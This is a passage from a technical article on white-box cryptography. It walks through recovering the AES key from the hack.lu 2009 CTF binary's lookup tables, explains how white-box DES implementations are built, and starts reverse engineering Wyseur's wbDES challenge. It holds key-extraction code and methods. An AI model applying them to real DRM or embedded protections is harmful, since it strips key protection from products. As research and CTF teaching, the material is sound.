|
|
|
// step-3
|
|
MixColumns(arg0);
|
|
}
|
|
|
|
// Last round
|
|
|
|
// step-4
|
|
for(i=0; i<16; i++)
|
|
arg0[i] = (char) 0x411138 [ i + arg0[i]*16 ];
|
|
|
|
// step-5
|
|
ShiftRows(arg0);
|
|
return;
|
|
}
|
|
---------------------------- Second version -------------------------------
|
|
|
|
This confirms the assumption that the WB is an AES as AES^-1 uses the
|
|
invert function of MixColumns which makes use of a different set of
|
|
coefficients (matrix inversion). As you can see the key material is not
|
|
explicit in the code, somehow hidden in the tables used in step-1. Kinda
|
|
normal for a WB ;)
|
|
|
|
|
|
----[ 4.2 - The key recovery
|
|
|
|
|
|
The general algorithm (not including the key schedule which generates K)
|
|
of AES-128 encryption is the following:
|
|
|
|
---------------------------------------------------------------------------
|
|
ROUNDS=10
|
|
def AES_128_Encrypt(in):
|
|
|
|
out = in
|
|
AddRoundKey(out, K[0])
|
|
|
|
for r in xrange(ROUNDS-1):
|
|
SubBytes(out)
|
|
ShiftRows(out)
|
|
MixColumns(out)
|
|
        AddRoundKey(out, K[r+1])
|
|
|
|
SubBytes(out)
|
|
ShiftRows(out)
|
|
AddRoundKey(out, K[10])
|
|
return out
|
|
---------------------------------------------------------------------------
|
|
|
|
Where K[r] is the subkey (16 bytes) used in round r. From now on, 'o'
|
|
is the symbol for the composition of functions, this allows us to write:
|
|
|
|
SubBytes o AddRoundKey(K[r],IN) = step-1(IN,r) for r in [0..9]
|
|
|
|
Exploiting the first round, this immediately gives a system of
|
|
equations (with S being located at 0x408138):
|
|
|
|
SubBytes(K[0][i] ^ arg0[i]) = S[ i + arg0[i]*16 ] for i in [0..15]
|
|
|
|
The equations hold for any arg0[i] and in particular for arg0[i] = 0.
|
|
The resulting simplified system is thus:
|
|
|
|
SubByte(K[0][i]) = S[i] for i in [0..15]
|
|
K[0][i] = SubByte()^-1 o S[i] for i in [0..15]
|
|
|
|
Let's try it on the rub^Wpython console:
|
|
|
|
---------------------------------------------------------------------------
|
|
>>> sbox2 = inv_bij(sbox); # We compute SubBytes^-1
|
|
>>> S2 = [0xFA, 0xD8, 0x88, 0x91, 0xF1, 0x93, 0x3B, 0x39, 0xAE, 0x69, 0xFF,
|
|
0xCB, 0xAB, 0xCD, 0xCF, 0xF7]; # dumped @ 0x0408138
|
|
>>> for i in xrange(16):
|
|
... S2[i] = sbox2[S2[i]];
|
|
...
|
|
>>> S2;
|
|
[20, 45, 151, 172, 43, 34, 73, 91, 190, 228, 125, 89, 14, 128, 95, 38]
|
|
---------------------------------------------------------------------------
|
|
|
|
But remember that a transposition is necessary to retrieve the subkey!
|
|
|
|
---------------------------------------------------------------------------
|
|
>>> P = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15] #I'm lazy :)
|
|
>>> S4 = []
|
|
>>> for i in xrange(16):
|
|
... S4.insert(i,S2[P[i]])
|
|
---------------------------------------------------------------------------
|
|
|
|
Now S4 holds the subkey K[0]. An interesting property of the AES key
|
|
schedule is that the subkey K[0] is equal to the key before derivation.
|
|
This is why our priority was to exploit the first round.
|
|
|
|
---------------------------------------------------------------------------
|
|
>>> s = 'hack.lu-2009-ctf'
|
|
>>> key = ''.join(map(lambda x: chr(x), S4))
|
|
>>> key
|
|
'\x14+\xbe\x0e-"\xe4\x80\x97I}_\xac[Y&'
|
|
>>> keyObj=AES.new(key)
|
|
>>> encPwd=keyObj.decrypt(s)
|
|
>>> encPwd.encode('hex').upper()
|
|
'192EF9E61164BD289F773E6C9101B89C'
|
|
---------------------------------------------------------------------------
|
|
|
|
And the solution is the same as baboon's one [R03]. Of course there
|
|
were many other ways to proceed but it's useless to even consider them due
|
|
to the very weak nature of this 'WB'.
|
|
|
|
|
|
----[ 4.3 - Random thoughts
|
|
|
|
|
|
Jb designed this challenge so that it could be solved in the 2-days
|
|
context of the hack.lu CTF. It's very likely that any reverser familiar
|
|
with the AES would be able to deal with it rather easily and so did baboon
|
|
at that time when he came up with a smart and quick solution [R03]. If Jb
|
|
had used the implementation described in [R07] then it would have been a
|
|
whole other game though still breakable [R05].
|
|
|
|
That being said, this implementation (which is based on what is called
|
|
partial evaluation) may only be a toy cipher but it's perfect to introduce
|
|
more advanced concepts. Indeed several security measures (amongst others)
|
|
were voluntarily missing:
|
|
|
|
- ShiftRows() and MixColumns() were not modified. A strong
|
|
implementation would have transformed them. Additionally SubBytes()
|
|
could have been transformed in a less gentle manner to mitigate
|
|
trivial attacks.
|
|
|
|
- There is a direct correspondence between an obfuscated function and
|
|
it's unprotected "normal" counterpart. Inputs and outputs of such
|
|
functions are synchronized or you could say that intermediate states
|
|
can be observed. "Internal encoding" removes this property.
|
|
|
|
- The first and last rounds should have a special protection. This is
|
|
because the input (respectively the output) of the first
|
|
(respectively the last) round can be synchronized with the normal
|
|
implementation. "External encoding" is used to prevent this but as a
|
|
        side effect alters the compatibility with the original encryption.
|
|
|
|
- etc.
|
|
|
|
Remark: If you ever come across a WB implementation, let me give you 2 nice
|
|
tricks to see in the blink of an eye if it's potentially weak or not:
|
|
|
|
- Look at the size of the implementation. Remember that the size of an
|
|
obfuscated primitive is deeply related to the number and size of the
|
|
lookup tables, the weight of the opcodes being generally negligible.
|
|
In this case, the binary was 85 kB whereas the state of the art
|
|
requires at least 770 kB. It was thus obvious that several
|
|
obfuscation layers were missing.
|
|
|
|
- The fully obfuscated version of the algorithms described in [R07]
|
|
only uses XOR and substitutions (lookup tables) as MixColumns and
|
|
ShiftRows are both transformed to make it possible. One may however
|
|
point out that the statement holds with T-tables based
|
|
implementations. It's true but such implementations use well known
|
|
tables so it's easy to fingerprint them.
|
|
|
|
Remember that real-life white-boxes (i.e. used in DRM, embedded
|
|
devices, etc.) are likely to be close to the state of the art (assuming
|
|
they are designed by crypto professionals and not by the average engineer
|
|
;)). Conversely, they may also face practical problematics (size, speed)
|
|
which have an impact on their security. This is especially true with
|
|
embedded devices.
|
|
|
|
|
|
--[ 5 - White-boxing the DES
|
|
|
|
|
|
If you're still reading (hi there!) then it probably means that you
|
|
already have at least a basic knowledge of cryptography. So you know that
|
|
DES should not be used because of its short keylength (56 bits), right?
|
|
Then why the hell should we be focused on it? Well because:
|
|
|
|
- There are only 2 public white-box design families: AES and DES
|
|
- If you can white-box DES, then you can probably white-box 3DES as
|
|
well (which is strong)
|
|
- I couldn't find a non commercial sophisticated enough AES WB to play
|
|
with and I don't want to be sued by M$, Adobe, etc. :D
|
|
|
|
Remark: While AES WB cryptanalyses are essentially algebraic, DES related
|
|
ones are statistical as you will soon find out.
|
|
|
|
|
|
----[ 5.1 - The DES algorithm
|
|
|
|
|
|
DES is a so called Feistel cipher [R01] with a block size of 64 bits
|
|
and 16 rounds (r). First a permutation (IP) is applied to the input then
|
|
in each round a round-function is applied which splits its input in two 32
|
|
bits buffers L (Left) and R (Right) and applies the following equations
|
|
system:
|
|
|
|
L(r+1) = R(r)
|
|
R(r+1) = L(r) [+] f(R(r),K(r))
|
|
|
|
With:
|
|
0 <= r < 16
|
|
[+] being the XOR operation
|
|
|
|
The round function is described by the following scheme:
|
|
|
|
--------------------------- DES round function ----------------------------
|
|
********** **********
|
|
* L(r) * * R(r) *
|
|
********** **********
|
|
| |
|
|
.------------- |
|
|
| | v .---------------------.
|
|
| | .-------------. / Linear transformation \
|
|
| | \ E-Box / ( 32b -> 48b )
|
|
| | '---------' \ /
|
|
| | | '---------------------'
|
|
| | v .------------.
|
|
| | ..... ********** / XOR operand \
|
|
| | . + .<------ * K(r) * ( 2x48b -> 48b )
|
|
| | ..... ********** \ /
|
|
| | /\ '------------'
|
|
| | / \
|
|
| | v v .-------------------------.
|
|
| | .------. .------. / Non linear transformation \
|
|
| | \ S1 / ... \ S8 / ( using SBox )
|
|
| | '--' '--' \ 8x6b -> 8x4b /
|
|
| | \ / '-------------------------'
|
|
| | \ /
|
|
| | v v .---------------------.
|
|
| | .--------. / Linear transformation \
|
|
| | | P-Box | ( 32b -> 32b )
|
|
| | '--------' \ /
|
|
| | | '---------------------'
|
|
| | ..v.. .------------.
|
|
| '--------->. + . / XOR operand \
|
|
| ..... ( 2x32b -> 32b )
|
|
| | \ /
|
|
v v '------------'
|
|
********** **********
|
|
* L(r+1) * * R(r+1) *
|
|
********** **********
|
|
---------------------------------------------------------------------------
|
|
|
|
When the 16 rounds are completed, the IP^-1() function is applied and
|
|
the result is called the ciphertext.
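
   To fix ideas, here is a minimal Python sketch of this structure. The
ip(), ip_inv() and f() callables are placeholders for the real IP, IP^-1
and round function, they are not the actual DES primitives:

---------------------------------------------------------------------------
# Minimal Feistel skeleton (sketch). ip, ip_inv and f are placeholders,
# NOT the real DES tables. L and R are handled as 32 bit integers.

def feistel_encrypt(block64, subkeys, ip, ip_inv, f):
    state = ip(block64)
    L, R = (state >> 32) & 0xFFFFFFFF, state & 0xFFFFFFFF
    for r in range(16):
        # L(r+1) = R(r) ; R(r+1) = L(r) [+] f(R(r),K(r))
        L, R = R, L ^ f(R, subkeys[r])
    # note: the real DES undoes the last swap (R16 || L16) before IP^-1
    return ip_inv((L << 32) | R)
---------------------------------------------------------------------------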
|
|
|
|
While SBox and XOR are self explanatory, let me give you a few more
|
|
details about the linear transformations (E-Box and P-Box).
|
|
|
|
|
|
The E-Box
|
|
---------
|
|
|
|
|
|
The E-Box is used to extend a 32 bits state into a 48b one so that each
|
|
bit can be combined with a round-key bit using a XOR. To transform 32 bits
|
|
into 48 bits, 16 out of the 32 bits are duplicated. This is performed using
|
|
the following table:
|
|
|
|
32, 1, 2, 3, 4, 5,
|
|
4, 5, 6, 7, 8, 9,
|
|
8, 9, 10, 11, 12, 13,
|
|
12, 13, 14, 15, 16, 17,
|
|
16, 17, 18, 19, 20, 21,
|
|
20, 21, 22, 23, 24, 25,
|
|
24, 25, 26, 27, 28, 29,
|
|
28, 29, 30, 31, 32, 1
|
|
|
|
For example, the first bit of output will be the last bit of input (32)
|
|
and the second bit of output will be the first bit of input (1). In this
|
|
particular case the bit positions are written from 1 to 32. As you may have
|
|
noticed, the 16 bits from columns 3 and 4 are not duplicated. They are
|
|
called the middle bits, we will see later why they are important.
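
   As a small illustration, the expansion can be sketched in Python
directly from the table above (bit positions are 1-indexed, as in the
table):

---------------------------------------------------------------------------
# Sketch of the E-Box expansion, working on a list of 32 bits where
# bits32[0] is "bit 1" of the table above.

E = [32,  1,  2,  3,  4,  5,    4,  5,  6,  7,  8,  9,
      8,  9, 10, 11, 12, 13,   12, 13, 14, 15, 16, 17,
     16, 17, 18, 19, 20, 21,   20, 21, 22, 23, 24, 25,
     24, 25, 26, 27, 28, 29,   28, 29, 30, 31, 32,  1]

def ebox(bits32):
    return [bits32[pos - 1] for pos in E]       # 32 bits -> 48 bits

# the middle bits are the positions selected exactly once:
middle = sorted(p for p in set(E) if E.count(p) == 1)
# -> [2, 3, 6, 7, 10, 11, 14, 15, 18, 19, 22, 23, 26, 27, 30, 31]
---------------------------------------------------------------------------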
|
|
|
|
|
|
The P-Box
|
|
---------
|
|
|
|
|
|
The P-Box is a bit permutation which means that every bit of input will
|
|
have a new position in the output. Such a transformation is linear and can
|
|
be represented by a bit matrix. When combined with a XOR operation with a
|
|
constant, this is what we call an affine transformation (AT).
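
   A tiny sketch of that equivalence, on a toy 4 bit permutation (not the
real P-Box):

---------------------------------------------------------------------------
# A bit permutation is linear: it can be written as y = M*x over GF(2).
# 'perm' is a toy 4 bit permutation, not the real P-Box.

perm = [2, 0, 3, 1]                  # output bit i takes input bit perm[i]

def apply_perm(bits):
    return [bits[perm[i]] for i in range(len(perm))]

M = [[1 if j == perm[i] else 0 for j in range(4)] for i in range(4)]

def affine(bits, c):                 # y = M*x [+] c, i.e. an AT
    return [(sum(M[i][j] & bits[j] for j in range(4)) ^ c[i]) & 1
            for i in range(4)]

x = [1, 0, 1, 1]
assert apply_perm(x) == affine(x, [0, 0, 0, 0])
---------------------------------------------------------------------------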
|
|
|
|
|
|
----[ 5.2 - An overview of DES WB primitives
|
|
|
|
|
|
The first WB DES implementation was presented in [R09]. Explaining how
|
|
and why DES white-boxes were designed is not the simplest of tasks,
|
|
especially with an ASCII / 75 columns constraint ;> I'll try to focus on
|
|
the main mechanisms so that you can get a global picture with the next
|
|
section. At some point you may however feel lost. In that case, please read
|
|
the excellent [R15] <3
|
|
|
|
|
|
The protection of I/O
|
|
---------------------
|
|
|
|
|
|
The reverser is able to intercept every step of the algorithm as well
|
|
as to examine all the memory. This gives him a huge advantage as he can
|
|
easily trace all inputs and outputs of elementary functions of the WB.
|
|
|
|
In the case of DES, this is even easier thanks to the very nature of
|
|
Feistel network. For example an attacker would easily locate the output of
|
|
the P-Box in round (r) because it is combined with part of the input: L(r).
|
|
To mitigate this, several transformations are performed:
|
|
|
|
a) All elementary operations of the white-box are performed on 96 bits
|
|
states. Let's try to understand why.
|
|
|
|
       Initially a native DES round begins with the 64 bits state
|
|
L(r) || R(r). R(r) is then extended using the E-box to
|
|
generate a 8x6 = 48 bits buffer and at the same time, L(r) and R(r)
|
|
are still part of the internal state because they are still
|
|
contributing to the round's operations:
|
|
|
|
|
|
************** **************
|
|
* L(r) * * R(r) *
|
|
************** **************
|
|
| .------------| 32b
|
|
| | v
|
|
| | .-------------------.
|
|
32b | 32b | | E-box |
|
|
| | '-------------------'
|
|
| | | 48b
|
|
v v v
|
|
Mem1 Mem2 Mem3
|
|
|
|
|
|
At this point the internal state is composed of 32 x 2 + 48 = 112
|
|
bits which is the maximum required size before being shrunken to a
|
|
64 bits state at the end of the round: L(r+1) || R(r+1). To avoid
|
|
any information leak, a unique -constant size- state is used to hide
|
|
the position of the bits.
|
|
|
|
       If you remember paragraph 5.1, the E-Box duplicates 16 out of
|
|
the 32 bits of R(r). As a result, constructing 'Mem2' can be done
|
|
       by extracting 16 bits out of R(r) and the 16 remaining ones out of
|
|
'Mem3'. With this property, the internal state is composed of 96
|
|
bits. Here is a diagram ripped from [R17] to understand how the
|
|
primitive is modified to handle this 96 bits state:
|
|
|
|
|
|
32b 48b 16b
|
|
************** ********************* ********
|
|
state 1: * L(r) * * X(r) * * r(r) *
|
|
************** ********************* ********
|
|
| | | |
|
|
| v | |
|
|
| ********* ..... | v
|
|
| * sK(r) *--> . + . | .-------.
|
|
| ********* ..... '-->( Merge )
|
|
| | '-------'
|
|
| v |
|
|
| .-------------. |
|
|
| \ S / |
|
|
| '---------' |
|
|
| | |
|
|
32b v v 32b 32b v
|
|
************** *************** ***************
|
|
state 2: * L(r) * * Y(r+1) * * R(r) *
|
|
************** *************** ***************
|
|
| | |
|
|
v | |
|
|
..... .--------. | |
|
|
. + .<---| P |<-' |
|
|
..... '--------' |
|
|
| |
|
|
32b '----------------------------------.
|
|
| | |
|
|
.-------------------|-----------' |
|
|
| 32b v v 32b
|
|
| .-------. .------.
|
|
| / E-box \ ( Select )
|
|
| 32b '-----------' '------'
|
|
| | |
|
|
v 48b v v 16b
|
|
************** ********************* ********
|
|
state 3: * L(r+1) * * X(r+1) * *r(r+1)*
|
|
************** ********************* ********
|
|
|
|
With:
|
|
- sK(r) being the subkey of round r
|
|
- X(r) being the output of the E-box of round r-1
|
|
- Y(r) being the output of the SBox of round r-1
|
|
- r(r) being the complementary bits so that X(r) and r(r) is a
|
|
duplication of R(r)
|
|
|
|
b) Input and outputs between elementary operations are protected using
|
|
what is called the "internal encodings". These encodings are applied
|
|
to functions implemented as lookup tables.
|
|
|
|
Let's take an example. You are chaining f() and g() which means that
|
|
you are calculating the composition g() o f(). Obviously without any
|
|
protection, an attacker can intercept the result of f() at debug
|
|
time (e.g. by putting a breakpoint at the entry of g())
|
|
|
|
Now if you want to protect it, you can generate a random bijection
|
|
h() and replace f() and g() by F() and G() where:
|
|
|
|
F() = h() o f()
|
|
G() = g() o h()^-1
|
|
|
|
Note: Again this is a mere example, we do not care about the
|
|
{co}domain consideration.
|
|
|
|
These functions are evaluated and then expressed as lookup tables.
|
|
Obviously this will not change the output as:
|
|
|
|
G() o F() = (g() o h()^-1) o (h() o f())
|
|
= g() o (h()^-1 o h()) o f() [associativity]
|
|
= g() o f()
|
|
|
|
But the difference is that intercepting the output of F() doesn't
|
|
give the output of f(). Pretty cool trick, right?
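
       A quick Python sketch of the trick on byte-sized lookup tables
       (f and g are arbitrary toy functions, h is a random byte
       bijection):

---------------------------------------------------------------------------
# Internal encoding sketch: F = h o f and G = g o h^-1, as lookup tables.

import random

f = [(x * 7 + 3) & 0xFF for x in range(256)]      # toy f()
g = [x ^ 0x5A           for x in range(256)]      # toy g()

h = list(range(256))
random.shuffle(h)                                 # random bijection h()
h_inv = [0] * 256
for x in range(256):
    h_inv[h[x]] = x

F = [h[f[x]]     for x in range(256)]             # F = h o f
G = [g[h_inv[x]] for x in range(256)]             # G = g o h^-1

for x in range(256):
    assert G[F[x]] == g[f[x]]          # composition unchanged...
    # ...but F[x] == f[x] only by accident: the output of f() is masked
---------------------------------------------------------------------------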
|
|
|
|
However I've just written that WB DES implementations were always
|
|
manipulating 96 bits states. Then does it mean that we need lookup
|
|
tables of 2^96 entries? No, this would be troublesome ;> We can use
|
|
the so called "path splitting" technique.
|
|
|
|
Consider the example of a 32 bits buffer. To avoid using a huge
|
|
lookup table, you can consider that this buffer is an 8 bits array.
|
|
Each element of the array will then be obfuscated using a
|
|
corresponding 8 bits lookup table as described below:
|
|
|
|
*****************************************
|
|
* IN[0] || IN[1] || IN[2] || IN[3] *
|
|
*****************************************
|
|
| | | |
|
|
| | | |
|
|
v v v v
|
|
.-------. .-------. .-------. .-------.
|
|
| 2^8 B | | 2^8 B | | 2^8 B | | 2^8 B |
|
|
'-------' '-------' '-------' '-------'
|
|
| | | |
|
|
| | | |
|
|
v v v v
|
|
*****************************************
|
|
* OUT[0] || OUT[1] || OUT[2] || OUT[3] *
|
|
*****************************************
|
|
|
|
I took the example of an 8 bits array but I could have used any
|
|
size. Something really important to understand: the smaller the
|
|
       lookup table is, the more information it will leak. Keep it in
|
|
mind.
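
       A sketch of this splitting on a 32 bits buffer seen as 4
       independent bytes (the tables here are random toy bijections):

---------------------------------------------------------------------------
# Path splitting sketch: one 2^8 entry table per byte of the state
# instead of a single (impossible) 2^32 entry table.

import random

tables = []
for i in range(4):
    t = list(range(256))
    random.shuffle(t)                  # toy byte bijection for lane i
    tables.append(t)

def split_apply(word32):
    out = 0
    for i in range(4):
        byte = (word32 >> (8 * i)) & 0xFF
        out |= tables[i][byte] << (8 * i)
    return out
---------------------------------------------------------------------------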
|
|
|
|
c) Do you remember when I said that a WB implementation was the exact
|
|
implementation of the corresponding crypto primitive? Well it's not
|
|
true. Or you could say that I was simplifying things ^_~
|
|
|
|
Most of the time (in real life), WB_DES() is a G() o DES() o F()
|
|
where F() and G() are encoding functions. So the first input
|
|
(plaintext) and the last output (ciphertext) may be obfuscated as
|
|
well. This is called an "external encoding" and this is used to
|
|
harden the white-box implementation. Indeed if there were no such
|
|
functions, first & last rounds would be weaker than other rounds.
|
|
This 'academic' protection aims at preventing trivial key recovery
|
|
attacks. A WB implementation without external encoding is said to be
|
|
'naked'.
|
|
|
|
In the context of real life protections, it may (or may not) be
|
|
associated with an additional layer to protect the I/O before &
|
|
after the encryption. It would be bad to intercept the plaintext
|
|
once decrypted, right? Commercial protections almost never use
|
|
native implementations for (at least) this reason. Intercepting a
|
|
plaintext is indeed far easier than recovering the encryption key.
|
|
|
|
In the WB DES case, common academic designs use affine functions,
|
|
encoded or not.
|
|
|
|
|
|
Transforming DES functions
|
|
--------------------------
|
|
|
|
|
|
Now that we've had an overview of how I/O were protected between
|
|
elementary functions, let's see how we can build said functions.
|
|
|
|
a) The partial evaluation
|
|
|
|
This is probably the most intuitive part of the WB implementation. This
|
|
is about 'fusing' the S-Boxes with the round-keys. This is exactly what was
|
|
performed in the previous AES challenge. If you can remember, this is also
|
|
the first example that I gave at the beginning of the paper to introduce
|
|
the white-boxing concept.
|
|
|
|
Using the previous diagram, it means that we want to convert this step:
|
|
|
|
32b 48b 16b
|
|
************** ********************* ********
|
|
* L(r) * * X(r) * * r(r) *
|
|
************** ********************* ********
|
|
| | | |
|
|
| v | |
|
|
| ****** ..... | v
|
|
| * sK *--> . + . | .-------.
|
|
| ****** ..... '-->( Merge )
|
|
| | '-------'
|
|
| v |
|
|
| .-------------. |
|
|
| \ S / |
|
|
| '---------' |
|
|
| | |
|
|
32b v v 32b 32b v
|
|
************** *************** **************
|
|
* L(r) * * Y(r+1) * * R(r) *
|
|
************** *************** **************
|
|
|
|
into this one:
|
|
|
|
|
|
*********************************************
|
|
* state 1 (12 x 8 = 96 bits) *
|
|
*********************************************
|
|
| | | |
|
|
v v v v
|
|
.-----..-----..-----. .-----.
|
|
| T0 || T1 || T2 | ... | T11 |
|
|
'-----''-----''-----' '-----'
|
|
| | | |
|
|
v v v v
|
|
*********************************************
|
|
* state 2 (96 bits) *
|
|
*********************************************
|
|
|
|
|
|
A lookup table Ti (mapping a byte to a byte) is called a 'T-Box'. There
|
|
are two types of T-Box because of the heterogeneity of the operations
|
|
performed on the state:
|
|
|
|
- The non neutral T-box. They are the 8 T-boxes involved with the
|
|
Sbox and the XOR. Each of them is concealing an Sbox and a subkey
|
|
mixing.
|
|
|
|
input:
|
|
-> 6 bits from X(r) to be mixed with the subkey
|
|
-> 1 bit from L(r) or r(r)
|
|
-> 1 bit from L(r) or r(r)
|
|
output:
|
|
-> 4 bits from the Sbox
|
|
-> 2 bits from X(r) taken from the input before being
|
|
mixed with the subkey
|
|
-> 1 bit from L(r) or r(r)
|
|
-> 1 bit from L(r) or r(r)
|
|
|
|
- The neutral T-box which are only used to connect bits of state 1
|
|
to bits of state 2. For example the bits of L(r) are never
|
|
involved in any operation between state 1 and state 2.
|
|
|
|
input:
|
|
-> 1 bit from L(r) or r(r)
|
|
-> 1 bit from L(r) or r(r)
|
|
[...]
|
|
-> 1 bit from L(r) or r(r)
|
|
output:
|
|
-> the input (permuted)
|
|
|
|
Keep in mind that in each case, you have a 'nibble view' of both inputs
|
|
and outputs. Moreover, permutations are used to make the
|
|
localization of the Sboxes harder upon simple observation. To have a better
|
|
understanding of this point as well as associated security explanations
|
|
I recommend to read [R09].
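
   To make the construction of a non neutral T-box more concrete, here is a
simplified sketch. toy_sbox() and the exact bit layout are made up for the
example; they follow neither the real DES tables nor a real WB generator:

---------------------------------------------------------------------------
# Simplified non neutral T-box: 8 input bits (6 bits of X(r) + 2 bypass
# bits) -> 8 output bits (4 Sbox bits, 2 input bits kept unmixed, 2
# bypass bits). toy_sbox and the layout are illustrative only.

def toy_sbox(x6):                      # 6 bits -> 4 bits, placeholder
    return ((x6 * 37) ^ (x6 >> 2)) & 0xF

def make_tbox(k6):                     # k6 = the 6 subkey bits fused in
    tbox = []
    for b in range(256):
        x6     = (b >> 2) & 0x3F       # 6 bits to be mixed with the key
        bypass = b & 0x3               # bits of L(r)/r(r), just carried
        kept   = (x6 >> 2) & 0x3       # 2 bits of X(r) kept "as is"
        tbox.append((toy_sbox(x6 ^ k6) << 4) | (kept << 2) | bypass)
    return tbox

T5 = make_tbox(0x2A)                   # one such T-box per Sbox per round
---------------------------------------------------------------------------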
|
|
|
|
b) The AT transformation
|
|
|
|
We now want to transform this:
|
|
|
|
|
|
************** *************** ***************
|
|
state 2: * L(r) * * Y(r+1) * * R(r) *
|
|
************** *************** ***************
|
|
| | |
|
|
v | |
|
|
..... .--------. | |
|
|
. + .<---| P |<-' |
|
|
..... '--------' |
|
|
| |
|
|
32b '----------------------------------.
|
|
| | |
|
|
.-------------------|-----------' |
|
|
| 32b v v 32b
|
|
| .-------. .------.
|
|
| / E-box \ ( Select )
|
|
| 32b '-----------' '------'
|
|
| | |
|
|
v 48b v v 16b
|
|
************** ********************* ********
|
|
state 3: * L(r+1) * * X(r+1) * *r(r+1)*
|
|
************** ********************* ********
|
|
|
|
into this:
|
|
|
|
*********************************************
|
|
* state 2 (96 bits) *
|
|
*********************************************
|
|
| | | |
|
|
v v v ... v
|
|
|
|
?????????????????????????????????????????????
|
|
|
|
| | | ... |
|
|
v v v v
|
|
*********************************************
|
|
* state 3 (96 bits) *
|
|
*********************************************
|
|
|
|
|
|
To put it simply, and as said earlier, the combination of the P-Box and
|
|
the following XOR is an affine function. Because we want to use lookup
|
|
tables to implement it we will have to use a matrix decomposition.
|
|
|
|
Let's take an example. You want to protect an 8x8 bit-matrix
|
|
multiplication. This matrix (M) can be divided into 16 2x2 submatrices as
|
|
shown below:
|
|
|
|
.----. .----.----.----.----. .----.
|
|
| Y0 | | A | B | C | D | | X0 |
|
|
.----. .----.----.----.----. '----'
|
|
| Y1 | | E | F | G | H | | X1 |
|
|
.----. = .----.----.----.----. x .----.
|
|
| Y2 | | I | J | K | L | | X2 |
|
|
.----. .----.----.----.----. .----.
|
|
| Y3 | | M | N | O | P | | X3 |
|
|
'----' '----'----'----'----' '----'
|
|
|
|
Vector Y Matrix M Vector X
|
|
|
|
Here the Yi and Xi are 2 bits sub-vectors while A,B,C,etc. are 2x2
|
|
bit-submatrices. Focusing on Y0, you can write:
|
|
|
|
Y0 = A*X0 [+] B*X1 [+] C*X2 [+] D*X3
|
|
|
|
Because A,B,C and D are constants it's possible to evaluate the
|
|
multiplications and build the corresponding lookup tables (Li). This gives
|
|
the following diagram:
|
|
|
|
****** ****** ****** ******
|
|
* X0 * * X1 * * X2 * * X3 *
|
|
****** ****** ****** ******
|
|
| | | |
|
|
v v v v
|
|
.----. .----. .----. .----.
|
|
| L0 | | L1 | | L3 | | L4 |
|
|
'----' '----' '----' '----'
|
|
| | | |
|
|
| ..... | | ..... |
|
|
'->. + .<-' '->. + .<-'
|
|
..... .....
|
|
| |
|
|
| ..... |
|
|
'------>. + .<------'
|
|
.....
|
|
|
|
|
v
|
|
******
|
|
* Y0 *
|
|
******
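
   The sketch below rebuilds Y0 exactly this way for a random 8x8 GF(2)
matrix and checks it against the direct product (pure illustration, no
encoding applied yet):

---------------------------------------------------------------------------
# Block decomposition sketch: Y0 rebuilt from four 4-entry lookup tables
# (one per 2x2 block of the first two rows of M), then XORed together.

import random

M = [[random.randint(0, 1) for _ in range(8)] for _ in range(8)]

def matvec(M, x):                      # reference: y = M*x over GF(2)
    return [sum(M[i][j] & x[j] for j in range(8)) & 1
            for i in range(8)]

LUT = []                               # LUT[j][v] = (A..D) * Xj, 2 bits
for j in range(4):
    r0, r1 = M[0][2*j:2*j+2], M[1][2*j:2*j+2]
    LUT.append([((r0[0] & (v & 1)) ^ (r0[1] & (v >> 1)),
                 (r1[0] & (v & 1)) ^ (r1[1] & (v >> 1)))
                for v in range(4)])

x = [random.randint(0, 1) for _ in range(8)]
chunks = [x[2*j] | (x[2*j+1] << 1) for j in range(4)]

# Y0 = A*X0 [+] B*X1 [+] C*X2 [+] D*X3, via table lookups and XORs:
y0 = [0, 0]
for j in range(4):
    y0 = [y0[0] ^ LUT[j][chunks[j]][0], y0[1] ^ LUT[j][chunks[j]][1]]

assert y0 == matvec(M, x)[0:2]
---------------------------------------------------------------------------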
|
|
|
|
You may object (and you would be right) that information is still
|
|
leaking and that it would be easy to retrieve the original matrix. Well
|
|
it's true. Thus to avoid this kind of situation two techniques are used:
|
|
|
|
- Each XOR operation is hidden inside a lookup table. In our example,
|
|
|
|
the resulting lookup tables have 2^(2x2) = 16 entries and 2^2 = 4
|
|
outputs (hence a size of 4x16 = 64 bits).
|
|
|
|
- Internal encoding (remember the previous explanations) is used to
|
|
protect the I/O between the lookup tables.
|
|
|
|
Our matrix multiplication becomes:
|
|
|
|
****** ****** ****** ******
|
|
* X0 * * X1 * * X2 * * X3 *
|
|
****** ****** ****** ******
|
|
|
|
| | | |
|
|
v v v v
|
|
|
|
2b 2b 2b 2b
|
|
<----><----> <----><---->
|
|
.----------. .----------.
|
|
\ S0 / \ S1 /
|
|
'------' '------'
|
|
<----> <---->
|
|
2b 2b
|
|
|
|
\ /
|
|
\ /
|
|
| |
|
|
v v
|
|
|
|
2b 2b
|
|
<----><---->
|
|
.---------.
|
|
\ S2 /
|
|
'------'
|
|
<---->
|
|
2b
|
|
|
|
|
|
|
v
|
|
|
|
******
|
|
* Y0 *
|
|
******
|
|
|
|
This is called an 'encoded network'. The main side effect of this
|
|
construction is the large number of lookup tables required.
|
|
|
|
|
|
--[ 6 - Breaking the second case: Wyseur's challenge
|
|
|
|
|
|
----[ 6.1 - Reverse engineering of the binary
|
|
|
|
|
|
As far as I can tell, there is an obvious need to rewrite the binary as
|
|
C code because:
|
|
|
|
- We need to understand exactly what's going on from a mathematical
|
|
point of view and C is more suitable than ASM for that purpose
|
|
|
|
- Rewriting the functions will allow us to manipulate them easily
|
|
with our tools. This is not mandatory though because we could
|
|
be using debugging functions on the original binary itself.
|
|
|
|
Again I won't detail all the reverse engineering process because this
|
|
is neither the main topic nor very hard anyway compared to what you may
|
|
find in the wild (in commercial protections).
|
|
|
|
|
|
High level overview
|
|
--------------------
|
|
|
|
|
|
Let's begin by running the executable:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./wbDES.orig
|
|
Usage: ./wbDES.orig <INPUT>
|
|
Where <INPUT> is an 8-byte hexadecimal representation of the input to be
|
|
encrypted
|
|
Example: ./wbDES.orig 12 32 e7 d3 0f f1 29 b3
|
|
---------------------------------------------------------------------------
|
|
|
|
OK so we need to provide the 8 bytes of the plaintext as separate
|
|
arguments in the command line. Hum, weird but OK. When the binary is
|
|
executed, the first thing performed is a conversion of the arguments
|
|
because obviously a suitable buffer for cryptographic operations is
|
|
necessary. The corresponding instructions were rewritten as the following
|
|
C function:
|
|
|
|
---------------------------------------------------------------------------
|
|
// I even emulated a bug, will you find it? ;>
|
|
inline void convert_args(char **argv)
|
|
{
|
|
int i = 0; // ebp-50h
|
|
|
|
while(i <= 7)
|
|
